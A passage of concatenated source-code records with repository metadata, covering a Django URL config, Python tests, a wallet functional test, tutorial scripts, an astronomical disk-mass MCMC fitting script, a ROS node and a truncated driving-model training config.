] | 38662795+manosplitsis@users.noreply.github.com |
4c34db92bf6e3b3781c4e90afde099476207f044 | d13c8a468edbcdd890d1cd797200528913f3d501 | /restful_project/restful_project/urls.py | fb63b0b9cdca52b877bf0f8c0d4cf64ce720352a | [] | no_license | MarjoHysaj/Semi-Restful-Validation | 78e4516db506c7e1381978252fedfee98abdb504 | 92a88df3243d61aa5be9d34253ecdceb92df6962 | refs/heads/main | 2023-04-15T00:55:50.336475 | 2021-04-21T17:58:00 | 2021-04-21T17:58:00 | 360,247,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | """restful_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
#path('admin/', admin.site.urls),
path('',include('restful_app.urls'))
]
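# Example of the "function views" pattern described in the docstring above (sketch only;
# `views.home` is hypothetical and does not exist in restful_app):
# from restful_app import views
# urlpatterns += [path('home/', views.home, name='home')]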
| [
"mariohysaj@gmail.com"
] | mariohysaj@gmail.com |
2eed8db45422d9c88538efb423a9a4754c1887e2 | 3a21faa925e8a21ad5e0d6dedf3037cc52750cbd | /datasciencebox/tests/test_cluster.py | 89b93a7e9fa3876d1158ec3b5b928d7a7a92c6fe | [
"Apache-2.0"
] | permissive | yabebalFantaye/datasciencebox | 9e630f9ad9139a609d9d925ce4a3f29467bf661f | 9f57ae85a034357d5bc15a12f3ebd15930f33ff1 | refs/heads/master | 2021-01-15T18:14:01.730969 | 2015-09-06T05:42:23 | 2015-09-06T05:42:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | import pytest
from datasciencebox.core.settings import Settings
from datasciencebox.core.cloud.cluster import Cluster
settings = Settings()
def test_cluster_from_to_list():
data = [{'id': 0, 'ip': '0.0.0.0'}, {'id': 1, 'ip': '1.1.1.1'}, {'id': 2, 'ip': '2.2.2.2'}]
cluster = Cluster.from_list(data, settings)
exported = cluster.to_list()
exported_ans = [{'id': 0,
'ip': '0.0.0.0'}, {'id': 1,
'ip': '1.1.1.1'}, {'id': 2,
'ip': '2.2.2.2'}]
assert isinstance(exported, list)
assert exported == exported_ans
assert len(cluster.instances) == 3
| [
"df.rodriguez143@gmail.com"
] | df.rodriguez143@gmail.com |
887f12f66788462a12d4ec5db7d2ecc742a147d3 | d37c7221cbcc410c08cdf66c11a36e29d2e5646b | /test/functional/wallet_groups.py | 2e410a0df45227e7dd62096a9ab7fea29d5e31b1 | [
"MIT"
] | permissive | pigycoin-project/pigycoin | 21e59a3c308cbe984fbd1f2c4dffd7508745e182 | 7b48eaa19d65b52f6d5bac0b40391bec93f0f62f | refs/heads/master | 2021-01-15T02:53:47.761729 | 2020-04-30T08:01:43 | 2020-04-30T08:01:43 | 244,434,555 | 2 | 3 | MIT | 2020-04-30T08:01:45 | 2020-03-02T17:39:05 | C++ | UTF-8 | Python | false | false | 3,929 | py | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test wallet group functionality."""
from test_framework.test_framework import PigycoinTestFramework
from test_framework.messages import CTransaction, FromHex, ToHex
from test_framework.util import (
assert_equal,
)
def assert_approx(v, vexp, vspan=0.00001):
if v < vexp - vspan:
raise AssertionError("%s < [%s..%s]" % (str(v), str(vexp - vspan), str(vexp + vspan)))
if v > vexp + vspan:
raise AssertionError("%s > [%s..%s]" % (str(v), str(vexp - vspan), str(vexp + vspan)))
class WalletGroupTest(PigycoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [[], [], ['-avoidpartialspends']]
self.rpc_timewait = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# Mine some coins
self.nodes[0].generate(110)
# Get some addresses from the two nodes
addr1 = [self.nodes[1].getnewaddress() for i in range(3)]
addr2 = [self.nodes[2].getnewaddress() for i in range(3)]
addrs = addr1 + addr2
# Send 1 + 0.5 coin to each address
[self.nodes[0].sendtoaddress(addr, 1.0) for addr in addrs]
[self.nodes[0].sendtoaddress(addr, 0.5) for addr in addrs]
self.nodes[0].generate(1)
self.sync_all()
# For each node, send 0.2 coins back to 0;
# - node[1] should pick one 0.5 UTXO and leave the rest
# - node[2] should pick one (1.0 + 0.5) UTXO group corresponding to a
# given address, and leave the rest
txid1 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
tx1 = self.nodes[1].getrawtransaction(txid1, True)
# txid1 should have 1 input and 2 outputs
assert_equal(1, len(tx1["vin"]))
assert_equal(2, len(tx1["vout"]))
# one output should be 0.2, the other should be ~0.3
v = [vout["value"] for vout in tx1["vout"]]
v.sort()
assert_approx(v[0], 0.2)
assert_approx(v[1], 0.3, 0.001)
txid2 = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
tx2 = self.nodes[2].getrawtransaction(txid2, True)
# txid2 should have 2 inputs and 2 outputs
assert_equal(2, len(tx2["vin"]))
assert_equal(2, len(tx2["vout"]))
# one output should be 0.2, the other should be ~1.3
v = [vout["value"] for vout in tx2["vout"]]
v.sort()
assert_approx(v[0], 0.2)
assert_approx(v[1], 1.3, 0.001)
# Empty out node2's wallet
self.nodes[2].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=self.nodes[2].getbalance(), subtractfeefromamount=True)
self.sync_all()
self.nodes[0].generate(1)
# Fill node2's wallet with 10000 outputs corresponding to the same
# scriptPubKey
for i in range(5):
raw_tx = self.nodes[0].createrawtransaction([{"txid":"0"*64, "vout":0}], [{addr2[0]: 0.05}])
tx = FromHex(CTransaction(), raw_tx)
tx.vin = []
tx.vout = [tx.vout[0]] * 2000
funded_tx = self.nodes[0].fundrawtransaction(ToHex(tx))
signed_tx = self.nodes[0].signrawtransactionwithwallet(funded_tx['hex'])
self.nodes[0].sendrawtransaction(signed_tx['hex'])
self.nodes[0].generate(1)
self.sync_all()
# Check that we can create a transaction that only requires ~100 of our
# utxos, without pulling in all outputs and creating a transaction that
# is way too big.
assert self.nodes[2].sendtoaddress(address=addr2[0], amount=5)
if __name__ == '__main__':
    WalletGroupTest().main()
| [
"61416421+pigycoin-project@users.noreply.github.com"
] | 61416421+pigycoin-project@users.noreply.github.com |
6e21f862d7e958f80ed264d9ffd7489494b638db | d9f52125601ec26f79202f0e912891b31b60ffc4 | /오후반/Sets/3_Set_union_Operation/3_Set_union_Operation_LGY.py | c79cb4088243b817c276b33d76d8101e5cfec87e | [] | no_license | YoungGaLee/2020_Python_coding-study | 5a4f36a39021c89ac773a3a7878c44bf8b0b811f | b876aabc747709afa21035c3afa7e3f7ee01b26a | refs/heads/master | 2022-12-12T13:34:44.729245 | 2020-09-07T04:07:48 | 2020-09-07T04:07:48 | 280,745,587 | 4 | 4 | null | 2020-07-22T03:27:22 | 2020-07-18T21:51:40 | Python | UTF-8 | Python | false | false | 135 | py | first = int(input())
A = set(input().split())
second = int(input())
B = set(input().split())
result = A.union(B)
print(len(result))
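# Equivalent using the union operator (sketch, same result):
# print(len(A | B))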
| [
"noreply@github.com"
] | YoungGaLee.noreply@github.com |
5fbc2ca52f2ffacd44d3d102faa15704d96af991 | e72d0aefcd47d8415ab498cc0dc46dc58d5a08c9 | /Profesional de BackEnd/1. Introduccion a Python y Django/Aprende Python y preparate para Django.py | e738a0a027c0b42b5e707a849934afe7a3e2e7be | [] | no_license | ivanmiranda/Mejorandola | 897c1fc8957c31df4c30533c91a9dd2d22c77bfe | b816beda385e05a50b74d7c9936079b28553ee18 | refs/heads/master | 2021-01-15T12:50:29.814094 | 2015-10-13T20:00:57 | 2015-10-13T20:00:57 | 43,966,540 | 0 | 0 | null | 2015-10-09T16:11:23 | 2015-10-09T16:11:23 | null | UTF-8 | Python | false | false | 3,984 | py | #-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: juan.flores
#
# Created: 07/01/2015
# Copyright: (c) juan.flores 2015
# Licence: <your licence>
#-------------------------------------------------------------------------------
# Resuming at minute 32
L=[22, True, "una lista",[1,2]]
lista = [1,7,4,9,-10,-7,5,0]
sorted(lista, reverse=True)
sorted(lista)
string="Esto es una cadena"
type(string)
diccionario = {'a' : 1, 'b' : 2, 'c' : 3, 'd' : 4}
diccionario2 = {'a' : 4, 'b' : 10, 'c' : 1, 'd' : -4}
sorted(diccionario2.items(), key=lambda x: x[1])
lista_dict = [{'item': 'cafe', 'valor':3},{'item':'azucar', 'valor':1},{'item':'pan', 'valor':5}]
sorted(lista_dict, key=lambda x: x['valor'])
print 'Contenido en string', string, ' y en lista', L
len(string)
len(L)
a, b, c = [1, 2, 3]
for l in L:
print l
for d in diccionario:
print d
for key, value in diccionario.items():
print 'key:', key, 'value:', value
print diccionario.items()
def my_first_function():
return "Hello World"
nombres = ['harvey', 'cursos', 'ventas']
emails = ['h@mejorando.la', 'cursos@mejorando.la', 'ventas@mejorando.la']
for n, e in zip(nombres, emails):
print 'nombre', n, 'email', e
print zip(nombres, emails)
print dict(zip(nombres, emails))
print lista
positivos = list()
for l in lista:
if l > 0:
positivos.append(l)
print positivos
positivos2 = []
positivos2 = [l for l in lista if l > 0]
print positivos2
pares = [{k: v} for k, v in diccionario2.items() if v%2 == 0]
print diccionario2
print pares
lista1 = [1,2,3,4]
lista2 = [3,4,5,6]
lista3 = [1,2,3,7,8,9,1,5,4,3,1]
print set(lista1) - set(lista2)
print set(lista2) - set(lista1)
print set(lista2) & set(lista1)
print set(lista2) | set(lista1)
print set(lista3)
print lista3
lista3 = list(set(lista3))
print lista3
print string
print string[0:6]
print string[:6]
print string[3:]
print lista
print lista[:4]
print lista[-4:]
print lista[::2]
print string[::3]
print lista
print lista[0]
del lista[0]
print lista[0]
print diccionario
del diccionario['c']
print diccionario
hoy = 'Hoy es 2015/12/01'
import re
print hoy
print re.sub(r'(\d+)/(\d+)/(\d+)', r'\3-\2-\1', hoy)
cadena = '{}: The Dark {}'
print cadena
print cadena.format('Carlos', 'Cow')
cadena = '{name}: The Dark {thing}'
print cadena
print cadena.format(name='Carlos', thing='Cow')
print cadena.format(thing='Cow', name='Carlos')
data = {'name': 'Carlos', 'thing': 'Cow'}
print cadena.format(**data)
print '%s: The Dark %s' % ('Carlos', 'Cow')
def func():
return 'Funcion'
print func()
def func(name, thing):
return '{name}: The Dark {thing}'.format(name=name, thing=thing)
print func('Carlos', 'Cow')
def func(*args, **kwargs):
print 'args', args
print 'kwargs', kwargs
print func('Carlos', 'Cow')
print func(name='Carlos', thing='Cow')
def func(*args, **kwargs):
print 'args', args
print 'kwargs', kwargs
if args:
return '{}: The Dark {}'.format(*args)
elif kwargs:
return '{name}: The Dark {thing}'.format(**kwargs)
else:
return 'Nothing'
print func()
print func('Carlos', 'Cow')
print func(name='Carlos', thing='Cow')
class Curso():
nombre = 'BackEnd'
profesor = 'Harvey'
c = Curso()
print c.nombre
print c.profesor
d = Curso()
print d.nombre
print d.profesor
class Curso():
def __init__(self, nombre, profesor):
self.nombre = nombre
self.profesor = profesor
c = Curso('FrontEnd', 'Leonidas')
print c
print c.nombre
print c.profesor
f = Curso('Backend', 'Harvey')
print f
print f.nombre
print f.profesor
class Curso():
def __init__(self, nombre, profesor):
self.nombre = nombre
self.profesor = profesor
def info(self):
return 'Esta es la clase 1 de {nombre} dictada por {profesor}'.format(nombre=self.nombre, profesor=self.profesor)
f = Curso('FrontEnd', 'Leonidas')
print f.info() | [
"juancfg_18@hotmail.com"
] | juancfg_18@hotmail.com |
eb328cba66a56a3747879cc13c2291de128fccc0 | 732d723fd09516b87a9e38f2698abd5ae58a8df7 | /fit_Mdyn/run_fit_V892Tau.py | 0f3636677ed8932c9afa41d721140286e8ebb9ee | [
"MIT"
] | permissive | vegajustin26/dyn-masses | d9244af48ee680dd9ac3523e5e79512f1163c766 | 9ff73fcec53beac59557c95fb1e47dc22947a333 | refs/heads/master | 2023-02-13T04:00:16.032224 | 2021-01-16T19:55:36 | 2021-01-16T19:55:36 | 277,567,969 | 0 | 0 | MIT | 2020-07-06T14:41:50 | 2020-07-06T14:41:50 | null | UTF-8 | Python | false | false | 10,294 | py | import os, sys, time
import numpy as np
import copy as copy
import scipy.constants as sc
from astropy.io import fits
from cube_parser import cube_parser
from vis_sample import vis_sample
from vis_sample.file_handling import import_data_uvfits
from scipy.ndimage import convolve1d
from scipy.interpolate import interp1d
import emcee
from multiprocessing import Pool
os.environ["OMP_NUM_THREADS"] = "1"
### FILE LOADING FROM SERVER
### -------------------------
# working_dir = '/Users/justinvega/Documents/GitHub/dyn-masses/fit_Mdyn/'
# filename_fits = 'V892Tau_data.uvfits'
# filename_npz = 'V892Tau.freq_conversions.npz'
# wwwfits = 'https://www.cfa.harvard.edu/~sandrews/data/'
#
# import urllib.request
# if not os.path.isdir(working_dir+'fake_data/data_uvfits/'):
# os.mkdir(working_dir+'fake_data/data_uvfits/')
# if not os.path.exists(working_dir+'fake_data/data_uvfits/'+filename_fits):
# print('Downloading UVFits...19 MB')
# urllib.request.urlretrieve(wwwfits+filename_fits, working_dir+'fake_data/data_uvfits/'+filename_fits)
# if not os.path.exists(working_dir+'fake_data/data_uvfits/'+filename_npz):
# print('Downloading Freq Conversions...32 K')
# urllib.request.urlretrieve(wwwfits+filename_npz, 'fake_data/data_uvfits/'+filename_npz)
### ASSIGN DATA TO FIT
### ------------------
# locate data
datadir = 'fake_data/data_uvfits/'
datafile = 'V892Tau_data'
suffix = '_posinc'
# velocity range to fit
vlo, vhi = -7., 23. # low and high LSRK velocities to fit [km/s]
vclo, vchi = 6.32, 8.24
# --> censored ranges should go here too
# spectral line information
nu_l = 230.538e9 # rest frequency of line [Hz]
# spectral signal processing
chbin = 2 # number of channels for binned averaging
chpad = 3 # number of channels to pad for SRF convolution
############
### CONSTANTS
### ---------
c_ = 2.99792e8 # speed of light [m/s]
### PROCESS DATA
### ------------
# load data visibilities with native channel spacings (LSRK)
data = import_data_uvfits(datadir+datafile+'.uvfits')
# extract the native channel frequencies, convert to LSRK velocities [m/s]
hdr = fits.open(datadir+datafile+'.uvfits')[0].header
freq0, idx0, nchan = hdr['CRVAL4'], hdr['CRPIX4'], hdr['NAXIS4']
data.freqs = freq0 + (np.arange(nchan) - idx0 + 1) * hdr['CDELT4']
vlsrk_native = c_ * (1. - data.freqs / nu_l)
# identify the subset of channel indices in the desired velocity range
vhi_idx = np.min(np.where(vlsrk_native < vlo * 1e3))
vlo_idx = np.max(np.where(vlsrk_native > vhi * 1e3)) + 1
Nch = np.abs(vhi_idx - vlo_idx)
# extract the subset of native channels of interest, padded for windowing
data.VV = data.VV[vlo_idx-chpad:vhi_idx+chpad,:]
data.wgts = data.wgts[:,vlo_idx-chpad:vhi_idx+chpad].T
data.freqs = data.freqs[vlo_idx-chpad:vhi_idx+chpad]
vlsrk_native = c_ * (1. - data.freqs / nu_l)
data.rfreq = np.mean(data.freqs)
# find the LSRK velocities that correspond to the midpoint of the execution
# block (*HARD-CODED: still need to figure this out for real data*)
#
freq_npz = 'V892Tau.freq_conversions'
df = np.load('fake_data/data_uvfits/' + freq_npz + '.npz')
freq_LSRK_t = df['freq_LSRK'].copy()
v_LSRK_t = c_ * (1. - freq_LSRK_t / nu_l)
midstamp = np.int(v_LSRK_t.shape[0] / 2)
freq_LSRK_mid, v_LSRK_mid = freq_LSRK_t[midstamp,:], v_LSRK_t[midstamp,:]
# grab only the subset of channels that span our desired outputs
vhi_idx = np.min(np.where(v_LSRK_mid < np.min(vlsrk_native))) #- 1
vlo_idx = np.max(np.where(v_LSRK_mid > np.max(vlsrk_native))) + 1
v_LSRK_mid = v_LSRK_mid[vlo_idx:vhi_idx]
freq_LSRK_mid = freq_LSRK_mid[vlo_idx:vhi_idx]
# make a copy of the input (native) data to bin
data_bin = copy.deepcopy(data)
# clip the unpadded data, so divisible by factor chbin
data_bin.VV = data_bin.VV[chpad:chpad+Nch-(Nch % chbin),:]
data_bin.wgts = data_bin.wgts[chpad:chpad+Nch-(Nch % chbin),:]
data_bin.freqs = data_bin.freqs[chpad:chpad+Nch-(Nch % chbin)]
# identify which binned channels are censored (FALSE)
data_bin_vlsrk = c_ * (1 - data_bin.freqs / nu_l)
cens_chans = np.ones_like(data_bin_vlsrk, dtype='bool')
badc = (data_bin_vlsrk >= 1e3 * vclo) & (data_bin_vlsrk <= 1e3 * vchi)
cens_chans[badc] = 0
donotuse = np.any(cens_chans.reshape((-1, chbin)), axis=1)
# binning (weighted, decimated average)
avg_wts = data_bin.wgts.reshape((-1, chbin, data_bin.wgts.shape[1]))
data_bin.VV = np.average(data_bin.VV.reshape((-1, chbin, data_bin.VV.shape[1])),
weights=avg_wts, axis=1)
data_bin.wgts = np.sum(avg_wts, axis=1)
data_bin.freqs = np.average(data_bin.freqs.reshape(-1, chbin), axis=1)
data_bin.rfreq = np.mean(data_bin.freqs)
Nch_bin = len(data_bin.freqs)
### PRECALCULATED QUANTITIES
### ------------------------
# covariance matrix and its inverse
Mbin = (5./16.)*np.eye(Nch_bin) + \
(3./32.)*(np.eye(Nch_bin, k=-1) + np.eye(Nch_bin, k=1))
Mbin_inv = np.linalg.inv(Mbin)
# log-likelihood normalization constant
dterm = np.empty(data_bin.VV.shape[1])
for i in range(len(dterm)):
sgn, lndet = np.linalg.slogdet(Mbin / data_bin.wgts[:,i])
dterm[i] = sgn * lndet
L0 = -0.5 * (np.prod(data_bin.VV.shape) * np.log(2 * np.pi) + np.sum(dterm))
# now censor the appropriate binned channels (set weights = 0)
data_bin.wgts[donotuse == False,:] = 0
### INITIALIZE FOR POSTERIOR SAMPLING
### ---------------------------------
# fixed model parameters
FOV, dist, Npix, Tbmax, r0 = 6.0, 134.5, 256, 1500., 10. # previously dist = 130, Tbmax = 700
# initialize walkers
p_lo = np.array([ 45, 40, 4.5, 150, 0.1, 0.5, 150,
0.2, 5, 7.5, -0.18, 0.10])
p_hi = np.array([ 65, 60, 6.5, 350, 5, 1.5, 350,
0.8, 30, 9.0, -0.08, 0.20])
ndim, nwalk = len(p_lo), 5 * len(p_lo)
p0 = [np.random.uniform(p_lo, p_hi, ndim) for i in range(nwalk)]
# 1 model to set up GCF, corr caches
theta = p0[0]
# sound speed
mu_l, mH = 28, sc.m_p + sc.m_e
csound = np.sqrt(2 * sc.k * theta[6] / (mu_l * mH))
foo = cube_parser(inc=theta[0], PA=theta[1], dist=dist, mstar=theta[2], r0=r0,
r_l=theta[3], z0=theta[4], zpsi=theta[5],
Tb0=theta[6], Tbq=theta[7], Tbmax=Tbmax, Tbmax_b=theta[8],
dV0=csound, dVq=0.5*theta[7], FOV=FOV, Npix=Npix,
Vsys=theta[9], restfreq=nu_l, vel=v_LSRK_mid)
tvis, gcf, corr = vis_sample(imagefile=foo, uu=data.uu, vv=data.vv,
return_gcf=True, return_corr_cache=True,
mod_interp=False)
### PRIOR FUNCTIONAL FORMS
### ----------------------
# uniform
def lnpU(theta, lo, hi):
if ((theta >= lo) and (theta <= hi)):
return 0
else:
return -np.inf
# normal
def lnpN(theta, mu, sig):
return -0.5 * np.exp(-0.5 * (theta - mu)**2 / sig**2)
# normal + uniform
def lnpNU(theta, mu, sig, lo, hi):
if ((theta < lo) or (theta > hi)):
return -np.inf
else:
return -0.5 * np.exp(-0.5 * (theta - mu)**2 / sig**2)
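# Quick sanity checks for the prior helpers above (sketch; left commented out so the
# script's behaviour is unchanged):
# print(lnpU(0.5, 0., 1.))            # 0 inside the bounds
# print(lnpU(2.0, 0., 1.))            # -inf outside the bounds
# print(lnpNU(2.0, 0., 1., -1., 1.))  # -inf: outside the allowed range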
### LOG(POSTERIOR)
### --------------
def lnprob(theta):
# calculate prior
ptheta = np.empty_like(theta)
ptheta[0] = lnpNU(theta[0], 54.5, 2., 0., 90.) #i (for negative inclination: lnpNU(theta[0], -54.5, 2., -90., 0.))
ptheta[1] = lnpNU(theta[1], 52.1, 2., 0., 360.) #PA
ptheta[2] = lnpU(theta[2], 0., 10.) #m
ptheta[3] = lnpNU(theta[3], 230., 30., r0, 0.5*(dist * FOV)) #r_l
ptheta[4] = lnpNU(theta[4], 1.0, 0.2, 0.1, 10.) #z0
ptheta[5] = lnpNU(theta[5], 1.0, 0.2, 0., 1.5) #zpsi
ptheta[6] = lnpU(theta[6], 5., Tbmax) #Tb0
ptheta[7] = lnpU(theta[7], 0., 2.) #Tbq
ptheta[8] = lnpNU(theta[8], 20., 2., 5., 50.) #Tback
ptheta[9] = lnpNU(theta[9], 8.2, 0.1, 7.5, 9.0) #v_sys
ptheta[10] = lnpNU(theta[10], -0.13, 0.02, -0.25, 0.0) #dx
ptheta[11] = lnpNU(theta[11], 0.15, 0.02, 0.0, 0.25) #dy
lnprior = np.sum(ptheta)
if (lnprior == -np.inf):
return -np.inf, -np.inf
# calculate sound speed
csound = np.sqrt(2 * sc.k * theta[6] / (mu_l * mH))
# generate a model cube
mcube = cube_parser(inc=theta[0], PA=theta[1], dist=dist, r0=r0,
mstar=theta[2], r_l=theta[3], z0=theta[4],
zpsi=theta[5], Tb0=theta[6], Tbq=theta[7],
Tbmax=Tbmax, Tbmax_b=theta[8], dV0=csound,
dVq=0.5*theta[7], FOV=FOV, Npix=Npix,
Vsys=theta[9], restfreq=nu_l, vel=v_LSRK_mid)
# sample the FT of the cube onto the observed (u,v) points
mvis = vis_sample(imagefile=mcube, mu_RA=theta[10], mu_DEC=theta[11],
gcf_holder=gcf, corr_cache=corr, mod_interp=False)
# window the visibilities
SRF_kernel = np.array([0.0, 0.25, 0.5, 0.25, 0.0])
mvis_re = convolve1d(mvis.real, SRF_kernel, axis=1, mode='nearest')
mvis_im = convolve1d(mvis.imag, SRF_kernel, axis=1, mode='nearest')
mvis = mvis_re + 1.0j*mvis_im
# interpolation
fint = interp1d(freq_LSRK_mid, mvis, axis=1, fill_value='extrapolate')
mvis = fint(data.freqs)
# excise the padded boundary channels to avoid edge effects
mvis = mvis[:,chpad:-chpad].T
mwgt = data.wgts[chpad:-chpad,:]
# clip for binning
mvis = mvis[:mvis.shape[0]-(mvis.shape[0] % chbin),:]
mwgt = mwgt[:mvis.shape[0]-(mvis.shape[0] % chbin),:]
# bin (weighted, decimated average)
mvis_bin = np.average(mvis.reshape((-1, chbin, mvis.shape[1])),
weights=mwgt.reshape((-1, chbin, mwgt.shape[1])),
axis=1)
# compute the log-likelihood
resid = np.absolute(data_bin.VV - mvis_bin)
lnL = -0.5 * np.tensordot(resid, np.dot(Mbin_inv, data_bin.wgts * resid))
# return the posterior
return lnL + L0 + lnprior, lnprior
### CONFIGURE EMCEE BACKEND
### -----------------------
filename = 'posteriors/'+datafile+suffix+'.h5'
#os.system('rm -rf '+filename)
backend = emcee.backends.HDFBackend(filename)
#backend.reset(nwalk, ndim)
# run the sampler
max_steps = 7000
with Pool() as pool:
sampler = emcee.EnsembleSampler(nwalk, ndim, lnprob, pool=pool,
backend=backend)
t0 = time.time()
sampler.run_mcmc(p0, max_steps, progress=True)
t1 = time.time()
print(' ')
print(' ')
print(' ')
print('This run took %.2f hours' % ((t1 - t0) / 3600))
| [
"vegajustin26@gmail.com"
] | vegajustin26@gmail.com |
0ee4bde0912431b07bd3f6d8bab8e461010a80cf | 0ec8745a351f23662fd2471f935d983a96194cf5 | /scripts/idle.py | 78d0b5300c10fbbb856bd952daf84516a73434fe | [] | no_license | robots21/jimmy | 8e885d9ed2fc79b2a6a0ab27ff829fd5d4280dc9 | 5452bc04604688d2fa126e416276755517c2f6c5 | refs/heads/master | 2020-05-16T21:47:58.242349 | 2014-04-11T00:05:06 | 2014-04-11T00:05:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,753 | py | #!/usr/bin/env python
import roslib; roslib.load_manifest('jimmy')
import rospy
from random import randint
from time import sleep
import time
from std_msgs.msg import String
from jimmy.msg import *
last_message_received_time = time.time()
def callback(data):
global last_message_received_time
print "GOT A MESSAGE"
last_message_received_time = time.time()
# idle = True
#print "IDLE motion interrupted"
# sleep(15)
#idle = False
#print "exit callback"
#wait 15 seconds when we hear input from somewhere else
def listener():
global last_message_received_time
rospy.init_node('idle_node', anonymous=True)
rospy.Subscriber("conversation", String, callback)
rospy.Subscriber("jimmy_send_gesture", jimmy_gesture, callback)
rospy.Subscriber("jimmy_send_servo", jimmy_servo, callback)
pub = rospy.Publisher("jimmy_idle", jimmy_gesture)
r = rospy.Rate(10)
while True:
# msg = jimmy_gesture()
# msg.cmd = randint(3,8)
#print "published gesture", msg.cmd
#pub.publish(msg)
#print "Gesture published"
if time.time() - last_message_received_time > 20:
# send a gesture here
last_message_received_time = time.time()
#print "last received a message %f seconds ago" % (time.time() - last_message_received_time)
#sleep(7)
r.sleep()
if __name__ == '__main__':
try:
idle = False
# espeak.set_parameter(espeak.Parameter.Rate,150)
# espeak.set_parameter(espeak.Parameter.Pitch,99)
## espeak.set_parameter(espeak.Parameter.Wordgap,)
# espeak.set_voice("en-sc")
# print "Ready to speak!"
listener()
except rospy.ROSInterruptException: pass
| [
"sophia.li@students.olin.edu"
] | sophia.li@students.olin.edu |
212dee1c894a426afc6a56693bd2a0927cc282fc | 0eda49f82fee0f7b8247fbea108861d3b54ab872 | /carla/configuration/ak23_ca17_doubledata.py | 5f5c43e9da9bfce619d298c411768e0556060cb0 | [] | no_license | jainSamkit/demo_codes | 08295b4e9c42e1e8ef5162030ef6489a6d67a8e8 | 9d4a4e9bf1cb0ce4dbf1bba21c06342c942576a2 | refs/heads/master | 2020-05-05T03:32:13.138218 | 2019-04-05T13:01:09 | 2019-04-05T13:01:09 | 179,676,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,505 | py | #this file trains for data from virtual world elektra data by agent;steer only, implementing fak17_cf45_steer.py
#also applies augmentation for the seven cameras
#the data contains both forward and backward laps
import random
import imgaug as ia
from imgaug import augmenters as iaa
import os
import glob
#
# This is a config file, with three parts: Input, Training, Output, which are then joined in Main
#
class configMain:
def __init__(self):
# this is used for data balancing. Labels are balanced first, and then for each label group
# the [-1,1] interval is split into so many equal intervals
# when we need to sample a mini-batch, we sample bins and then sample inside the bins
self.number_steering_bins = 2
self.batch_size = self.number_steering_bins*60
self.batch_size_val = self.number_steering_bins*60
self.number_images_val = 20* self.batch_size_val # Number of images used in a validation Section
self.sequence_size_lstm = 0
self.fusion_size =1
self.sequence_size =(self.fusion_size)*2 # this 2 is about reducing the frame rate 2x
self.sequence_resample = self.fusion_size
self.resample_stride = self.sequence_size/self.sequence_resample
self.sequence_stride = self.sequence_size/2 # this is also about the frame rate
self.number_of_sequences = self.batch_size/(self.sequence_size_lstm+1)
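# with sequence_size_lstm = 0 this reduces to number_of_sequences == batch_size,
# i.e. one independent frame per "sequence"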
#self.input_size = (227,227,3)
#self.manager_name = 'control_speed'
# y , x
self.image_size = (88,200,3)
self.network_input_size = (88,200,3)
self.variable_names = ['Steer','Gas','Brake','Hand_B','Reverse','Steer_N','Gas_N','Brake_N','Pos_X','Pos_Y','Speed',\
'C_Gen','C_Ped','C_Car','Road_I','Side_I','Acc_x','Acc_y','Acc_z','Plat_Ts','Game_Ts','Ori_X','Ori_Y',\
'Ori_Z','Control','Camera','Angle']
# _N is noise, Yaw_S is angular speed
self.targets_names =['Steer']
self.targets_sizes = [1]
#self.inputs_names =['Control']
#self.inputs_sizes = [4]
# if there is branching, this is used to build the network. Names should be same as targets
# currently the ["Steer"]x4 should not be changed
self.branch_config = [["Steer"]]
# a list of keep_prob corresponding to the list of layers:
# 8 conv layers, 2 img FC layer, 5 branches X 2 FC layers each
self.dropout = [0.8]*8 + [0.5]*2 + [0.5,.5]*len(self.branch_config)
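# with a single branch this yields 8 + 2 + 2 = 12 keep_prob entries, one per layer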
self.restore = True # This is if you want to restore a saved model
self.sensor_names = ['rgb','labels'] # which sensor streams you want to store
self.sensors_size = [(88,200,3),(88,200,1)]
self.models_path = os.path.join('models', os.path.basename(__file__).split('.')[0])
self.train_path_write = os.path.join(self.models_path, 'train')
self.val_path_write = os.path.join(self.models_path, 'val')
self.test_path_write = os.path.join(self.models_path, 'test')
self.number_iterations = 300000 # 300k
self.number_steering_branches = 0
# Control the execution of simulation testing during training
self.perform_simulation_test = False
self.output_is_on = True
self.pre_train_experiment = None
class configInput(configMain):
def __init__(self):
configMain.__init__(self)
st = lambda aug: iaa.Sometimes(0.4, aug)
oc = lambda aug: iaa.Sometimes(0.3, aug)
rl = lambda aug: iaa.Sometimes(0.09, aug)
self.augment = iaa.Sequential([
rl(iaa.GaussianBlur((0, 1.5))), # blur images with a sigma between 0 and 1.5
rl(iaa.AdditiveGaussianNoise(loc=0, scale=(0.0, 0.05), per_channel=0.5)), # add gaussian noise to images
oc(iaa.Dropout((0.0, 0.10), per_channel=0.5)), # randomly remove up to X% of the pixels
oc(iaa.CoarseDropout((0.0, 0.10), size_percent=(0.08, 0.2),per_channel=0.5)), # randomly remove up to X% of the pixels
oc(iaa.Add((-40, 40), per_channel=0.5)), # change brightness of images (by -X to Y of original value)
st(iaa.Multiply((0.10, 2.5), per_channel=0.2)), # change brightness of images (X-Y% of original value)
rl(iaa.ContrastNormalization((0.5, 1.5), per_channel=0.5)), # improve or worsen the contrast
rl(iaa.Grayscale((0.0, 1))), # put grayscale
],
random_order=True # do all of the above in random order
)
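# st/oc/rl above apply each augmenter stochastically to roughly 40%, 30% and 9% of
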